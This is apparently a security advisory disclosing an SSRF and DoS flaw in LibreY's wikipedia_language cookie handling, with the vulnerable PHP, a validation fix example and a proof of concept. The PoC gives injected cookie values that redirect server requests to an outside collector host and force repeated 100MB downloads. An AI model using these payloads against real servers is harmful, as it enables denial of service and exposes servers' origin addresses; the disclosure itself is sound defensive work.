Summary
Server-Side Request Forgery (SSRF) vulnerability in `engines/google/text.php` and `engines/duckduckgo/text.php` before commit be59098 allows remote attackers to request the server to send HTTP GET requests to arbitrary targets and conduct Denial-of-Service (DoS) attacks via the `wikipedia_language` cookie.
Details
In `engines/google/text.php`, the `wikipedia_language` cookie is interpolated as the first part (the host label) of the URL to which a GET request is sent.
LibreY/engines/google/text.php, lines 55 to 63 in 3687c4b:

```php
        case 7:
            $wikipedia_language = isset($_COOKIE["wikipedia_language"]) ? trim(htmlspecialchars($_COOKIE["wikipedia_language"])) : $config->wikipedia_language;
            $url = "https://$wikipedia_language.wikipedia.org/w/api.php?format=json&action=query&prop=extracts%7Cpageimages&exintro&explaintext&redirects=1&pithumbsize=500&titles=$query_encoded";
            break;
    }

    if ($url != NULL)
    {
        $special_ch = curl_init($url);
```
If the cookie contains a slash, the domain is no longer wikipedia.org. If the cookie further ends with a hash sign, the `.wikipedia.org/w/api.php?...` suffix becomes the fragment of the URL, so the path of the request target is also controlled by the attacker. The attacker can therefore make the server send arbitrary GET requests, and DoS attacks can be conducted by requesting the server to download large files. If the server is behind a CDN, the origin IP address can be disclosed via the SSRF, so the DDoS protection provided by the CDN could be bypassed.
Fortunately, in `engines/special/wikipedia.php`, the response is decoded as JSON, so this is almost a blind SSRF where the attacker cannot see the response.
LibreY/engines/special/wikipedia.php, lines 2 to 34 in 3687c4b:

```php
function wikipedia_results($query, $response)
{
    global $config;

    $query_encoded = urlencode($query);

    $json_response = json_decode($response, true);

    $first_page = array_values($json_response["query"]["pages"])[0];

    if (!array_key_exists("missing", $first_page))
    {
        $description = substr($first_page["extract"], 0, 250) . "...";

        $wikipedia_language = isset($_COOKIE["wikipedia_language"]) ? trim(htmlspecialchars($_COOKIE["wikipedia_language"])) : $config->wikipedia_language;

        $source = check_for_privacy_frontend("https://$wikipedia_language.wikipedia.org/wiki/$query");
        $response = array(
            "special_response" => array(
                "response" => htmlspecialchars($description),
                "source" => $source
            )
        );

        if (array_key_exists("thumbnail", $first_page))
        {
            $image_url = $first_page["thumbnail"]["source"];
            $response["special_response"]["image"] = $image_url;
        }

        return $response;
    }
}
```
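As an added example (not LibreY's code and not the fix in commit be59098), the following PHP shows why the `trim(htmlspecialchars(...))` filter in the snippets above does not stop the injection, and how a strict shape check on the cookie value would; the regex pattern and the helper function names are assumptions.

```php
<?php
// Added example, not LibreY's code: why htmlspecialchars() does not prevent
// the injection, and one assumed way to validate the cookie value instead.

// Wikipedia language subdomains are short lowercase labels such as "en",
// "de", "simple" or "zh-yue". Accepting only that shape rules out '/', '#',
// '.', '@' and ':' and so keeps the value inside the intended host label.
const WIKIPEDIA_LANGUAGE_PATTERN = '/\A[a-z]{2,12}(-[a-z]{2,12})?\z/';

function is_valid_wikipedia_language(string $value): bool
{
    return preg_match(WIKIPEDIA_LANGUAGE_PATTERN, $value) === 1;
}

// Hardened cookie lookup (hypothetical helper): fall back to the configured
// default whenever the cookie does not look like a language code.
function wikipedia_language_from_cookie(array $cookies, string $default): string
{
    $value = isset($cookies["wikipedia_language"]) ? trim($cookies["wikipedia_language"]) : "";
    return is_valid_wikipedia_language($value) ? $value : $default;
}

// Same string interpolation as the vulnerable engine, so its effect can be inspected.
function build_wikipedia_api_url(string $language, string $query): string
{
    return "https://$language.wikipedia.org/w/api.php?format=json&action=query"
        . "&prop=extracts%7Cpageimages&exintro&explaintext&redirects=1&pithumbsize=500"
        . "&titles=" . urlencode($query);
}

// Constructed cookie values: a legitimate code and one shaped like the PoC.
// htmlspecialchars() only encodes & < > " and ', so it leaves both untouched.
$cases = ["en", "attacker.example/foo#"];

foreach ($cases as $raw) {
    $filtered = trim(htmlspecialchars($raw));           // what the original code keeps
    $parts = parse_url(build_wikipedia_api_url($filtered, "bar"));
    $validated = wikipedia_language_from_cookie(["wikipedia_language" => $raw], "en");
    // For the PoC-style value, host is attacker.example and path is /foo; the
    // intended ".wikipedia.org/w/api.php?..." part ends up in the fragment,
    // which curl never sends. The validated value falls back to "en".
    printf("cookie %-24s -> host %-22s path %-14s | validated: %s\n",
        var_export($raw, true), $parts["host"], $parts["path"], $validated);
}
```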
PoC
SSRF
- Get a URL at https://requestrepo.com/, e.g. xxx.requestrepo.com.
- Set `wikipedia_language` to `xxx.requestrepo.com/foo#`.
- Search "bar".
- Observe a request for https://xxx.requestrepo.com/foo at https://requestrepo.com/.
DoS
Send requests to `/search.php?q=dos` with the header `Cookie: wikipedia_language=speed.hetzner.de/100MB.bin#` multiple times, and then send normal requests to observe long response times or errors.
Impact
Remote attackers can make the server download large files to degrade its performance or even deny access to legitimate users.
Remote attackers can get the IP address of the server even if it is behind a CDN.
Patches
This has been fixed in #9.
LibreY hosters are advised to use the latest commit, and LibreX hosters are advised to migrate to LibreY.